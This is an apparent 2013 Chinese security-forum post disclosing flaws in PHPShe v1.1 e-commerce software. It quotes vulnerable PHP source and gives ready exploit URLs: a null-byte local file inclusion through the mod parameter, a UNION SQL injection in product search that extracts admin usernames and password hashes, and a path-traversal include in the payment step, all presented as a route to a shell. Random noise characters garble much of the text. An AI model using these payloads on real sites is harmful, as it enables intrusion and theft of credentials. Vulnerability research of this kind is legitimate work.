中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
" H! a5 _! ^) k, p- D/* Phpshe v1.1 Vulnerability; w8 S- E) A* I6 \3 {: Z: t% I
/* ========================
/ Q6 B  L8 w9 ]2 Q/* By: : Kn1f3
2 |9 p+ u. D: Q5 `( V2 W/* E-Mail : 681796@qq.com9 L* S  g1 ~. ~3 x0 M6 h5 k
/*******************************************************/
- Z; w) g" Y/ N+ K0×00 整体大概参数传输/ x7 ~- Q+ Z' Z3 v. p
4 w3 N2 [- Z) i; i) o

- j5 @; y2 M' P
: K' q$ R& o2 x8 O//common.php
6 f6 s6 B7 F) ~, X# ?if (get_magic_quotes_gpc()) {( ?  t1 @. J9 W' t; d1 F3 W
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');( \) N2 k" K  x; [$ E
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
0 j) w( s* n: L, Y- S2 S" Y. ?/ S}
: n, \4 R7 p! i3 ^" u) uelse {
4 O% I: I0 H% X: _!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');3 O) k+ e, R7 {9 o- ~: m
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
4 B  l, m1 r% B}, y6 u* T% B3 j/ m1 I2 C0 Z* t. s4 ^+ B
session_start();" L) G! J8 E+ D8 Y, k
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
# ~. T0 B1 y8 G% h!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');' U; C) O0 y+ |+ z0 F$ e0 Z  \

; I$ R+ l' `- u0×01 包含漏洞7 {) @+ N% g* Y* m. p* \

( P# E$ x( \+ E+ z+ s6 z. X! z) ~% C
//首页文件
6 Z+ _" p! N# G% f$ l9 q<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);) l; @8 o2 q. k
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
7 K8 c' b: Q! J3 V6 L* G& tpe_result();
# v8 I0 |% D9 O4 g' E2 y3 v, G$ K?>: b4 i3 c: S4 j. w6 m& D
//common 文件 第15行开始' j% Q4 H7 G, v( `
url路由配置6 N' J5 i9 d: n* L4 F9 Q) ^" s
$module = $mod = $act = 'index';  U" O, z; P: P# ]2 h
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
0 B1 R; Z1 O- a) r$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
# R% l" O& W& D3 M8 N& Y$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);4 i7 Z" R) B8 [8 `
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
5 P; y" u- t. N$ C3 |; F

3 X+ L  \% x7 E" f2 |

+ l6 [7 T7 x$ m0 d9 J4 V 0×02 搜索注入
* i3 x/ y( Y7 }9 m/ p- R! u
! K/ e, ~# i5 W: v# |9 @<code id="code2">

//product.php文件
$ a( U* \. F4 ^2 p* T0 B6 G. y; wcase 'list':. v/ |7 a' A, Z, M/ E' ]
$category_id = intval($id);
1 O, {+ {' W0 z  h+ {$info = $db->pe_select('category', array('category_id'=>$category_id));
8 G: A( ]1 L- k. J! |% N6 ^//搜索
: o" f5 d1 ]/ c! q8 ]1 |$sqlwhere = " and `product_state` = 1";
. Y. S- _# s& Y5 A% }' |pe_lead('hook/category.hook.php');% b/ p! a2 _- F" S! t, Q
if ($category_id) {) b6 K# Q+ I! C
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";1 u) H1 L5 R) L8 i0 l0 k3 M
}
5 `& h9 R0 ~2 N# ]1 s# E$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤* }6 d' I( y: g) n! X5 O
if ($_g_orderby) {" E9 c7 ]+ b# `
$orderby = explode('_', $_g_orderby);
3 K) g# ?9 u- }( f/ Y$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
1 M! D5 x7 g) S+ t" g* d}1 I! o1 l' E3 C0 q- K2 o
else {
8 y$ x3 e- ]% J8 U6 _1 P2 g$sqlwhere .= " order by `product_id` desc";
/ c  ?% D; E" D! m}! ~/ C. B8 [2 }* A* o3 [0 t/ T
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
- i2 C: ~, h0 K$ ~# l//热卖排行
! W! P" H4 Y" H: A$product_hotlist = product_hotlist();
5 s& Z7 ^, ]5 R. p/ N: A3 F5 k//当前路径! G/ T4 }4 w) I8 Z6 \
$nowpath = category_path($category_id);
) A3 Z( x5 H4 J6 O: F: L  B$seo = pe_seo($info['category_name']);
6 F8 G5 s0 ~$ b% S9 F3 ?$ Xinclude(pe_tpl('product_list.html'));4 Z! H5 D% y6 _
//跟进selectall函数库( U8 f! g" T" y2 \8 c& h! m2 g
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())0 [. g3 u' J8 @/ {
{# C0 _+ ~; A, I1 G0 l: l! E
//处理条件语句
6 x* j% t  J6 ^' }) B( ~$sqlwhere = $this->_dowhere($where);
( u0 G1 Q/ Y3 g$ j$ u( Dreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
( W. w4 q- l9 T% C}3 f% ]8 A" t& K4 ?
//exp$ \# E$ T" x5 p$ p4 }$ {
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1  G# J; \3 ~4 Y1 M8 P4 O* T1 x5 f

</code>( s1 t: k3 o3 t; N9 n
( X* J5 k7 B  Y: s% L/ N
0×03 包含漏洞2" }& F0 ~( `( _: U) k" Z

0 b* v% ~0 I# E# b- i, b3 U<code id="code3">

//order.php

case 'pay':


# k/ ~5 c. U* o* M2 u$order_id = pe_dbhold($_g_id);

: M$ n# Z& q& w
$cache_payway = cache::get('payway');


3 |: M! C1 K$ d/ N4 [) h  Tforeach($cache_payway as $k => $v) {


4 t$ O& {$ z6 k5 B$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


) E  [. K& P+ ]4 @9 V3 `- X4 b+ m. E# @) oif ($k == 'bank') {


, i1 }1 T) [( _! q7 p- f% _' n7 g$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


6 m) L$ `; ]; F' ?7 U' F9 v2 d}

: \. ~. \6 K1 p' ?9 w  q
}


6 D/ S5 j7 t# ]* ?$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


- m) I3 Y& ~( y$ T# T!$order['order_id'] && pe_error('订单号错误...');

5 W) X/ }4 S# W* @) H
if (isset($_p_pesubmit)) {

0 N8 K- R8 P/ w7 G6 S
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


8 v3 L  w: [! \4 z. p$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


: [( ^) y" q4 T2 J; Qforeach ($info_list as $v) {

  ]7 @% @! g% \2 [& E4 [/ r# ?
$order['order_name'] .= "{$v['product_name']};";$ c1 X  H/ v$ \) |9 r, r! y3 F' l


6 C- V" A3 m/ b) R# r}


, m% \2 K6 I0 Y' k& xecho '正在为您连接支付网站,请稍后...';


$ z) |9 t) u5 [9 ginclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


# u5 N, a& q& K. G9 O& s, C( a}//当一切准备好的时候就可以进行"鸡肋包含了"


9 u1 ~  M' r/ o: g% relse {


% W# C: a& G+ q4 d; bpe_error('支付错误...');

0 Z5 L9 q2 M9 `5 A0 k* a, h
}

- |1 A+ _0 ^" P( ~) {! w  {: h
}

% W1 w8 R& R# ^) X4 ?* {; m# h& h3 l
$seo = pe_seo('选择支付方式');


3 D* Y& A- V  L8 @( Qinclude(pe_tpl('order_pay.html'));


2 y: S1 Z3 N" D- Z  Vbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
1 k/ _3 @; U) P/ w! m$ y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2